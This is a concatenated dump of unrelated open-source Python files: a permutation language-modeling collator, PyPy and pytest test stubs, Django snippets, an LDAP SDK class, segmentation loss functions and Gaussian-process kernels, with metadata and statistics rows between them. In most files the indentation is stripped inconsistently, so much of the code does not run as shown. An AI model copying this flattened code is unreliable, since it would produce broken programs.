        # Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
        non_func_mask = ~(padding_mask | special_tokens_mask)
inputs = tf.where(masked_indices, self.tokenizer.mask_token_id, inputs)
labels = tf.where(masked_indices, labels, -100) # We only compute loss on masked tokens
perm_mask = []
for i in range(len(labels)):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
# tf.range is the equivalent of torch.arange
perm_index = tf.range(labels_shape[1])
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = tf.transpose(tf.reshape(perm_index, (-1, labels_shape[1] // 2)))
# Permute the two halves such that they do not cross over
perm_index = tf.random.shuffle(perm_index) # Shuffles along the first dimension
# Flatten this out into the desired permuted factorisation order
perm_index = tf.reshape(tf.transpose(perm_index), (-1,))
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index = tf.where(~masked_indices[i] & non_func_mask[i], -1, perm_index)
# The logic for whether the i-th token can attend on the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask.append(
(tf.reshape(perm_index, (labels_shape[1], 1)) <= tf.reshape(perm_index, (1, labels_shape[1])))
& masked_indices[i]
)
perm_mask = tf.stack(perm_mask, axis=0)
return tf.cast(inputs, tf.int64), tf.cast(perm_mask, tf.float32), target_mapping, tf.cast(labels, tf.int64)
def numpy_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
from random import randint
import numpy as np
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if inputs.shape[1] % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = np.copy(inputs)
# Creating the mask and target_mapping tensors
        masked_indices = np.full(labels.shape, 0, dtype=bool)
target_mapping = np.zeros((labels.shape[0], labels.shape[1], labels.shape[1]), dtype=np.float32)
for i in range(labels.shape[0]):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = labels.shape[1]
while cur_len < max_len:
                # Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be
                # masked); note `random.randint` is inclusive on both ends, unlike `torch.randint`
                span_length = randint(1, self.max_span_length)
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
                # Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
                # span_length]` (inclusive, since `random.randint` includes both ends) and mask tokens
                # `start_index:start_index + span_length`
                start_index = cur_len + randint(0, context_length - span_length)
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
            # the i-th prediction corresponds to the i-th token.
target_mapping[i] = np.eye(labels.shape[1])
special_tokens_mask = np.array(
[self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()],
            dtype=bool,
)
masked_indices[special_tokens_mask] = 0
        if self.tokenizer._pad_token is not None:
            padding_mask = labels == self.tokenizer.pad_token_id
            masked_indices[padding_mask] = 0
        else:
            # without a pad token there is nothing to mask out, but `padding_mask` is still needed below
            padding_mask = np.zeros_like(labels, dtype=bool)
        # Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
        non_func_mask = ~(padding_mask | special_tokens_mask)
inputs[masked_indices] = self.tokenizer.mask_token_id
labels[~masked_indices] = -100 # We only compute loss on masked tokens
perm_mask = np.zeros((labels.shape[0], labels.shape[1], labels.shape[1]), dtype=np.float32)
for i in range(labels.shape[0]):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
perm_index = np.arange(labels.shape[1])
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = perm_index.reshape((-1, labels.shape[1] // 2)).T
# Permute the two halves such that they do not cross over
np.random.shuffle(perm_index)
# Flatten this out into the desired permuted factorisation order
perm_index = perm_index.T.flatten()
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index[~masked_indices[i] & non_func_mask[i]] = -1
# The logic for whether the i-th token can attend on the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask[i] = (
perm_index.reshape((labels.shape[1], 1)) <= perm_index.reshape((1, labels.shape[1]))
) & masked_indices[i]
return inputs.astype(np.int64), perm_mask, target_mapping, labels.astype(np.int64)
==== rpython/jit/backend/aarch64/test/test_list.py ====
repo: nanjekyejoannah/pypy @ e80079fe13c29eda7b2a6b4cd4557051f975a2d9 | lang: Python | size: 268 bytes
licenses: Apache-2.0, OpenSSL | stars: 333 (2015-08-08 to 2022-03-22) | issues: 7 | forks: 55
hexsha: fc4fa4bfabc51f3c680545b499ee16fcc5d20013
from rpython.jit.metainterp.test.test_list import ListTests
from rpython.jit.backend.aarch64.test.test_basic import JitAarch64Mixin
class TestList(JitAarch64Mixin, ListTests):
# for individual tests see
# ====> ../../../metainterp/test/test_list.py
pass
==== lms/lms_app/models.py ====
repo: leooAprigioo/ac-lp @ e1428ea4f73629de999ec0b8a190779afdf6c488 | lang: Python | size: 201 bytes
licenses: Apache-2.0
hexsha: fc64b2b95d542e870e92e2a2fce3e0b080d9bb86
from django.db import models
from lms_app.professor import Professor
from lms_app.disciplina import Disciplina
from lms_app.aluno import Aluno
from lms_app.disciplinaOfertada import DisciplinaOfertada
==== bin/create_result_relatory_template/create_test_relatory_template/__main__.py ====
repo: danilocgsilva/a_vs_n @ fb807d6c785e188a0024ba2ef8e4b16117432dd4 | lang: Python | size: 47 bytes
licenses: MIT
hexsha: fca1309e28aabffedaf6d33aaf02810f093fa982
def main():
print("Not implemented yet.")
==== generate_files/load_pickle_for_R.py ====
repo: justinsavoie/justinsavoie.github.io @ 67ed6e5e1f8430d123832fc992d6a7f56b9592b4 | lang: Python | size: 379 bytes
licenses: MIT
hexsha: 5d7f7c41077d5abe98d9d5eea05bfe26e367da6d
import pickle
mariage = pickle.load(open("/Users/vpl_001/Documents/justinsavoie.github.io/generate_files/mariage_url.txt",'rb'))
preparatifs = pickle.load(open("/Users/vpl_001/Documents/justinsavoie.github.io/generate_files/prep_url.txt",'rb'))
couple_reception = pickle.load(open("/Users/vpl_001/Documents/justinsavoie.github.io/generate_files/couple_reception_url.txt",'rb'))
==== imcsdk/mometa/ldap/LdapCACertificateManagement.py ====
repo: ragupta-git/ImcSdk @ 2e41f2ffe5282d38de85bc4739fa53dd2f0c9bb4 | lang: Python | size: 4,108 bytes
licenses: Apache-2.0 | forks: 3 (2018-11-14)
hexsha: 5dbbe661ba0b894a17145c19393c2db5be155ae0
"""This module contains the general information for LdapCACertificateManagement ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class LdapCACertificateManagementConsts:
pass
class LdapCACertificateManagement(ManagedObject):
"""This is LdapCACertificateManagement class."""
consts = LdapCACertificateManagementConsts()
naming_props = set([])
mo_meta = {
"classic": MoMeta("LdapCACertificateManagement", "ldapCACertificateManagement", "ldap-ca-cert-mgmt", VersionMeta.Version2013e, "InputOutput", 0x1f, [], ["admin", "user"], [u'aaaLdap'], [u'downloadLdapCACertificate', u'exportLdapCACertificate', u'ldapCACertificate'], ["Get", "Set"]),
"modular": MoMeta("LdapCACertificateManagement", "ldapCACertificateManagement", "ldap-ca-cert-mgmt", VersionMeta.Version2013e, "InputOutput", 0x1f, [], ["admin", "read-only", "user"], [u'aaaLdap'], [u'downloadLdapCACertificate', u'exportLdapCACertificate', u'ldapCACertificate'], ["Get", "Set"])
}
prop_meta = {
"classic": {
"binding_certificate": MoPropertyMeta("binding_certificate", "bindingCertificate", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["Disabled", "Enabled", "disabled", "enabled"], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"description": MoPropertyMeta("description", "description", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
},
"modular": {
"binding_certificate": MoPropertyMeta("binding_certificate", "bindingCertificate", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["Disabled", "Enabled", "disabled", "enabled"], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"description": MoPropertyMeta("description", "description", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
},
}
prop_map = {
"classic": {
"bindingCertificate": "binding_certificate",
"dn": "dn",
"rn": "rn",
"status": "status",
"childAction": "child_action",
"description": "description",
},
"modular": {
"bindingCertificate": "binding_certificate",
"dn": "dn",
"rn": "rn",
"status": "status",
"childAction": "child_action",
"description": "description",
},
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.binding_certificate = None
self.status = None
self.child_action = None
self.description = None
ManagedObject.__init__(self, "LdapCACertificateManagement", parent_mo_or_dn, **kwargs)
==== main/views.py ====
repo: AthmanZiri/django-site @ 04c6e0967b628b8ebef1ca1caae8cee83c1a2f07 | lang: Python | size: 209 bytes
licenses: MIT
hexsha: 5dce42fee1fe89d83e482f80d80e9faf3a04d2b2
from django.shortcuts import render
def index(request):
return render(request, 'index.html', {})
def team(request):
    team_sisi = 'hello mates!'
return render(request, 'team.html', {'team_sisi': team_sisi})
==== testing/example_scripts/fixtures/fill_fixtures/test_extend_fixture_conftest_module/conftest.py ====
repo: markshao/pytest @ 611b579d21f7e62b4c8ed54ab70fbfee7c6f5f64 | lang: Python | size: 62 bytes
licenses: MIT | stars: 9,225 (2015-06-15 to 2022-03-31) | issues: 7,794 | forks: 2,598
hexsha: 5dfd2f779579c732f249d12b379fd7f97e5dc830
import pytest
@pytest.fixture
def spam():
return "spam"
==== loss/combine_loss.py ====
repo: shijun18/RS_SEG20 @ 0c55f5f3a53cef84d0e907d5662c72a76eaa0413 | lang: Python | size: 5,321 bytes
licenses: MIT | stars: 4 (2020-11-15 to 2021-07-26)
hexsha: f8ee0e98bbc856ee44e0a54e56c538317abd446c
import torch
import torch.nn as nn
import torch.nn.functional as F
from loss.dice_loss import DiceLoss
from loss.cross_entropy import CrossentropyLoss, TopKLoss
class BCEPlusDice(nn.Module):
"""Dice loss, need one hot encode input
Args:
weight: An array of shape [num_classes,]
ignore_index: class index to ignore
predict: A list of two tensors
target: A list of two tensors
other args pass to BinaryDiceLoss
Return:
combination loss, dice plus bce
"""
def __init__(self, weight=None, ignore_index=None, **kwargs):
super(BCEPlusDice, self).__init__()
self.kwargs = kwargs
self.weight = weight
self.ignore_index = ignore_index
def forward(self, predict, target):
assert isinstance(predict,list)
assert isinstance(target,list)
assert len(predict) == len(target) and len(predict) == 2
dice = DiceLoss(weight=self.weight,ignore_index=self.ignore_index,**self.kwargs)
dice_loss = dice(predict[1],target[1])
bce = nn.BCEWithLogitsLoss(self.weight)
bce_loss = bce(predict[0],target[0])
total_loss = bce_loss + dice_loss
return total_loss
#---------------------------------seg loss---------------------------------
class CEPlusDice(nn.Module):
"""Dice loss, need one hot encode input
Args:
weight: An array of shape [num_classes,]
ignore_index: class index to ignore
predict: A list of two tensors
target: A list of two tensors
other args pass to BinaryDiceLoss
Return:
combination loss, dice plus cross entropy
"""
def __init__(self, weight=None, ignore_index=None, **kwargs):
super(CEPlusDice, self).__init__()
self.kwargs = kwargs
self.weight = weight
self.ignore_index = ignore_index
def forward(self, predict, target):
# print(predict.size())
# print(target.size())
assert predict.size() == target.size()
dice = DiceLoss(weight=self.weight,ignore_index=self.ignore_index,**self.kwargs)
dice_loss = dice(predict,target)
ce = CrossentropyLoss(weight=self.weight)
ce_loss = ce(predict,target)
total_loss = ce_loss + dice_loss
return total_loss
class CEPlusTopkDice(nn.Module):
"""Dice loss, need one hot encode input
Args:
weight: An array of shape [num_classes,]
ignore_index: class index to ignore
predict: A list of two tensors
target: A list of two tensors
other args pass to BinaryDiceLoss
Return:
combination loss, dice plus cross entropy
"""
def __init__(self, weight=None, ignore_index=None, **kwargs):
super(CEPlusTopkDice, self).__init__()
self.kwargs = kwargs
self.weight = weight
self.ignore_index = ignore_index
def forward(self, predict, target):
# print(predict.size())
# print(target.size())
assert predict.size() == target.size()
dice = DiceLoss(weight=self.weight,ignore_index=self.ignore_index,**self.kwargs)
dice_loss = dice(predict,target)
ce = CrossentropyLoss(weight=self.weight)
ce_loss = ce(predict,target)
total_loss = ce_loss + dice_loss
return total_loss
class TopkCEPlusDice(nn.Module):
"""Dice loss, need one hot encode input
Args:
weight: An array of shape [num_classes,]
ignore_index: class index to ignore
predict: A list of two tensors
target: A list of two tensors
other args pass to BinaryDiceLoss
Return:
combination loss, dice plus topk cross entropy
"""
def __init__(self, weight=None, ignore_index=None, **kwargs):
super(TopkCEPlusDice, self).__init__()
self.kwargs = kwargs
self.weight = weight
self.ignore_index = ignore_index
def forward(self, predict, target):
assert predict.size() == target.size()
dice = DiceLoss(weight=self.weight,ignore_index=self.ignore_index,**self.kwargs)
dice_loss = dice(predict,target)
topk = TopKLoss(weight=self.weight,**self.kwargs)
topk_loss = topk(predict,target)
total_loss = topk_loss + dice_loss
return total_loss
class TopkCEPlusTopkDice(nn.Module):
"""Dice loss, need one hot encode input
Args:
weight: An array of shape [num_classes,]
ignore_index: class index to ignore
predict: A list of two tensors
target: A list of two tensors
other args pass to BinaryDiceLoss
Return:
combination loss, dice plus topk cross entropy
"""
def __init__(self, weight=None, ignore_index=None, **kwargs):
super(TopkCEPlusTopkDice, self).__init__()
self.kwargs = kwargs
self.weight = weight
self.ignore_index = ignore_index
def forward(self, predict, target):
assert predict.size() == target.size()
dice = DiceLoss(weight=self.weight,ignore_index=self.ignore_index,**self.kwargs)
dice_loss = dice(predict,target)
topk = TopKLoss(weight=self.weight,k=50)
topk_loss = topk(predict,target)
total_loss = topk_loss + dice_loss
return total_loss
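# A minimal usage sketch (not part of the original file). It assumes the
# DiceLoss and CrossentropyLoss implementations imported above accept the
# calls made in forward(); tensor shapes are illustrative only.
if __name__ == "__main__":
    logits = torch.randn(2, 3, 8, 8)  # N x C x H x W predictions
    index = torch.randint(0, 3, (2, 1, 8, 8))
    one_hot = torch.zeros(2, 3, 8, 8).scatter_(1, index, 1.0)  # one-hot target
    criterion = CEPlusDice()
    print(criterion(logits, one_hot))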
| 32.248485
| 88
| 0.635407
| 656
| 5,321
| 4.990854
| 0.11128
| 0.100794
| 0.021381
| 0.030544
| 0.858277
| 0.858277
| 0.850031
| 0.848503
| 0.848503
| 0.848503
| 0
| 0.001788
| 0.264236
| 5,321
| 165
| 89
| 32.248485
| 0.834483
| 0.302011
| 0
| 0.688312
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.12987
| false
| 0
| 0.064935
| 0
| 0.324675
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5d23324bebbb96bcd86062de4dbb3f8f58d2f232
| 40
|
py
|
Python
|
bot_facebook/views/__init__.py
|
lariodiniz/BootPlayGame
|
1ba40611eb085e2deaff63a36bdb669b594c7c02
|
[
"MIT"
] | null | null | null |
bot_facebook/views/__init__.py
|
lariodiniz/BootPlayGame
|
1ba40611eb085e2deaff63a36bdb669b594c7c02
|
[
"MIT"
] | null | null | null |
bot_facebook/views/__init__.py
|
lariodiniz/BootPlayGame
|
1ba40611eb085e2deaff63a36bdb669b594c7c02
|
[
"MIT"
] | null | null | null |
from .ativa_bot_view import ativaBotView
| 40
| 40
| 0.9
| 6
| 40
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075
| 40
| 1
| 40
| 40
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5d679ff2eb030804c21d156f046cdb4330b38397
| 103
|
py
|
Python
|
Python/tests/scripts/test_script_out_param.py
|
tritm78/sqlmlutils
|
9b9ba866bcfbab7a1d0329fcdfad2816bf322d97
|
[
"MIT"
] | 1
|
2020-03-19T18:03:20.000Z
|
2020-03-19T18:03:20.000Z
|
Python/tests/scripts/test_script_out_param.py
|
TheRockStarDBA/sqlmlutils
|
956bdd72638a649f0e613f100fbb81c900dcb65e
|
[
"MIT"
] | null | null | null |
Python/tests/scripts/test_script_out_param.py
|
TheRockStarDBA/sqlmlutils
|
956bdd72638a649f0e613f100fbb81c900dcb65e
|
[
"MIT"
] | null | null | null |
def foo(t1, t2, t3):
return str(t1)+str(t2)
res = foo(t1,t2,t3)
print("Testing output!")
| 12.875
| 27
| 0.563107
| 18
| 103
| 3.222222
| 0.611111
| 0.172414
| 0.241379
| 0.310345
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 0.242718
| 103
| 7
| 28
| 14.714286
| 0.641026
| 0
| 0
| 0
| 0
| 0
| 0.15625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0.25
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
53b92e8f2a4b67faec233ebac104720d7c490fa1
| 30,998
|
py
|
Python
|
artgpn/weight.py
|
jdavidrcamacho/artgpn
|
69d4dbc5a44b0861331d8d3a5ac5013ebd97bac8
|
[
"MIT"
] | null | null | null |
artgpn/weight.py
|
jdavidrcamacho/artgpn
|
69d4dbc5a44b0861331d8d3a5ac5013ebd97bac8
|
[
"MIT"
] | null | null | null |
artgpn/weight.py
|
jdavidrcamacho/artgpn
|
69d4dbc5a44b0861331d8d3a5ac5013ebd97bac8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
#because it makes my life easier down the line
pi, exp, sine, cosine, sqrt = np.pi, np.exp, np.sin, np.cos, np.sqrt
class weightFunction(object):
"""
Definition of the weight function kernels of our network.
Kernels not fully implemented yet:
Matern32 and Matern52
"""
def __init__(self, *args):
"""
Puts all kernel arguments in an array pars
"""
self.pars = np.array(args, dtype=float)
def __call__(self, r, t1 = None, t2=None):
"""
r = t - t'
Not sure if this is a good approach, since it will make our life harder
when defining certain non-stationary kernels, e.g. the linear kernel.
"""
raise NotImplementedError
def __repr__(self):
"""
Representation of each kernel instance
"""
return "{0}({1})".format(self.__class__.__name__,
", ".join(map(str, self.pars)))
#Not working yet!
# def __minus__(self, b):
# return Minus(self, b)
# def __rminus__(self, b):
# return self.__minus__(b)
#
#
#class _operator(weightFunction):
# """
# To allow operations between two kernels
# """
# def __init__(self, k1):
# self.k1 = k1
#
# @property
# def pars(self):
# return np.append(self.k1.pars)
#
#
#class Minus(_operator):
# """
# To allow a "minus" linear kernel
# """
# def __repr__(self):
# return "-{0}".format(self.k1)
#
# def __call__(self, r):
# return -self.k1(r)
##### Constant #################################################################
class Constant(weightFunction):
"""
This kernel returns its constant argument c
Parameters:
c = constant
"""
def __init__(self, c):
super(Constant, self).__init__(c)
self.c = c
self.type = 'non-stationary and anisotropic'
self.derivatives = 1 #number of derivatives in this kernel
self.params_size = 1 #number of hyperparameters
def __call__(self, r):
return self.c**2 * np.ones_like(r)
class dConstant_dc(Constant):
"""
Log-derivative in order to c
"""
def __init__(self, c):
super(dConstant_dc, self).__init__(c)
self.c = c
def __call__(self, r):
return 2*self.c * np.ones_like(r)
##### White Noise ##############################################################
class WhiteNoise(weightFunction):
"""
Definition of the white noise kernel.
Parameters:
wn = white noise amplitude
"""
def __init__(self, wn):
super(WhiteNoise, self).__init__(wn)
self.wn = wn
self.type = 'stationary'
self.derivatives = 1 #number of derivatives in this kernel
self.params_size = 1 #number of hyperparameters
def __call__(self, r):
if r[0,:].shape == r[:,0].shape:
return self.wn**2 * np.diag(np.diag(np.ones_like(r)))
else:
return np.zeros_like(r)
class dWhiteNoise_dwn(WhiteNoise):
"""
Log-derivative in order to the amplitude
"""
def __init__(self, wn):
super(dWhiteNoise_dwn, self).__init__(wn)
self.wn = wn
def __call__(self, r):
return 2 * self.wn**2 * np.diag(np.diag(np.ones_like(r)))
##### Squared exponential ######################################################
class SquaredExponential(weightFunction):
"""
Squared Exponential kernel, also known as radial basis function or RBF
kernel in other works.
Parameters:
weight = weight/amplitude of the kernel
ell = length-scale
"""
def __init__(self, weight, ell):
super(SquaredExponential, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
self.type = 'stationary and anisotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp(-0.5 * r**2 / self.ell**2)
class dSquaredExponential_dweight(SquaredExponential):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell):
super(dSquaredExponential_dweight, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 * exp(-0.5 * r**2 / self.ell**2)
class dSquaredExponential_dell(SquaredExponential):
"""
Log-derivative in order to the ell
"""
def __init__(self, weight, ell):
super(dSquaredExponential_dell, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return (r**2 * self.weight**2 / self.ell**2) \
* exp(-0.5 * r**2 / self.ell**2)
##### Periodic #################################################################
class Periodic(weightFunction):
"""
Definition of the periodic kernel.
Parameters:
weight = weight/amplitude of the kernel
ell = length scale
P = period
"""
def __init__(self, weight, P, ell):
super(Periodic, self).__init__(weight, P, ell)
self.weight = weight
self.P = P
self.ell = ell
self.type = 'non-stationary and isotropic'
self.derivatives = 3 #number of derivatives in this kernel
self.params_size = 3 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp( -2 * sine(pi*np.abs(r)/self.P)**2 /self.ell**2)
class dPeriodic_dweight(Periodic):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, P, ell):
super(dPeriodic_dweight, self).__init__(weight, P, ell)
self.weight = weight
self.P = P
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 * exp(-2 * sine(pi * np.abs(r) / self.P)**2 \
/ self.ell**2)
class dPeriodic_dell(Periodic):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, P, ell,):
super(dPeriodic_dell, self).__init__(weight, P, ell)
self.weight = weight
self.P = P
self.ell = ell
def __call__(self, r):
return (4* self.weight**2 * sine(pi * np.abs(r) / self.P)**2 \
*exp(-2 * sine(pi * np.abs(r) / self.P)**2 \
/ self.ell**2)) / self.ell**2
class dPeriodic_dP(Periodic):
"""
Log-derivative in order to P
"""
def __init__(self, weight, ell, P):
super(dPeriodic_dP, self).__init__(weight, P, ell)
self.weight = weight
self.P = P
self.ell = ell
def __call__(self, r):
return (4 * pi * r * self.weight**2 \
* cosine(pi*np.abs(r) / self.P) *sine(pi*np.abs(r) / self.P) \
* exp(-2 * sine(pi*np.abs(r) / self.P)**2 / self.ell**2)) \
/ (self.ell**2 * self.P)
##### Quasi Periodic ###########################################################
class QuasiPeriodic(weightFunction):
"""
This kernel is the product between the exponential sine squared kernel
and the squared exponential kernel, commonly known as the quasi-periodic
kernel.
Parameters:
weight = weight/amplitude of the kernel
ell_e = evolutionary time scale
ell_p = length scale of the Periodic component
P = kernel Periodicity
"""
def __init__(self, weight, ell_e, P, ell_p):
super(QuasiPeriodic, self).__init__(weight, ell_e, P, ell_p)
self.weight = weight
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
self.type = 'non-stationary and anisotropic'
self.derivatives = 4 #number of derivatives in this kernel
self.params_size = 4 #number of hyperparameters
def __call__(self, r):
return self.weight**2 *exp(- 2*sine(pi*np.abs(r)/self.P)**2 \
/self.ell_p**2 - r**2/(2*self.ell_e**2))
class dQuasiPeriodic_dweight(QuasiPeriodic):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell_e, P, ell_p):
super(dQuasiPeriodic_dweight, self).__init__(weight, ell_e, P, ell_p)
self.weight = weight
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return 2 * self.weight**2 *exp(-2 * sine(pi*np.abs(r)/self.P)**2 \
/self.ell_p**2 - r**2/(2*self.ell_e**2))
class dQuasiPeriodic_delle(QuasiPeriodic):
"""
Log-derivative in order to ell_e
"""
def __init__(self, weight, ell_e, P, ell_p):
super(dQuasiPeriodic_delle, self).__init__(weight, ell_e, P, ell_p)
self.weight = weight
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return (r**2 * self.weight**2 / self.ell_e**2) \
*exp(-2 * sine(pi*np.abs(r)/self.P)**2 \
/self.ell_p**2 - r**2/(2*self.ell_e**2))
class dQuasiPeriodic_dP(QuasiPeriodic):
"""
Log-derivative in order to P
"""
def __init__(self, weight, ell_e, P, ell_p):
super(dQuasiPeriodic_dP, self).__init__(weight, ell_e, P, ell_p)
self.weight = weight
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return 4 * pi * r * self.weight**2 \
* cosine(pi*np.abs(r)/self.P) * sine(pi*np.abs(r)/self.P) \
* exp(-2 * sine(pi * np.abs(r)/self.P)**2 \
/self.ell_p**2 - r**2/(2*self.ell_e**2)) \
/ (self.ell_p**2 * self.P)
class dQuasiPeriodic_dellp(QuasiPeriodic):
"""
Log-derivative in order to ell_p
"""
def __init__(self, weight, ell_e, P, ell_p):
super(dQuasiPeriodic_dellp, self).__init__(weight, ell_e, P, ell_p)
self.weight = weight
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return 4 * self.weight**2 * sine(pi*r/self.P)**2 \
* exp(-2 * sine(pi*np.abs(r)/self.P)**2 \
/self.ell_p**2 - r**2/(2*self.ell_e**2)) / self.ell_p**2
##### Rational Quadratic #######################################################
class RationalQuadratic(weightFunction):
"""
Definition of the rational quadratic kernel.
Parameters:
weight = weight/amplitude of the kernel
alpha = weight of large and small scale variations
ell = characteristic length scale to define the kernel "smoothness"
"""
def __init__(self, weight, alpha, ell):
super(RationalQuadratic, self).__init__(weight, alpha, ell)
self.weight = weight
self.alpha = alpha
self.ell = ell
self.type = 'stationary and anisotropic'
self.derivatives = 3 #number of derivatives in this kernel
self.params_size = 3 #number of hyperparameters
def __call__(self, r):
return self.weight**2 / (1+ r**2/ (2*self.alpha*self.ell**2))**self.alpha
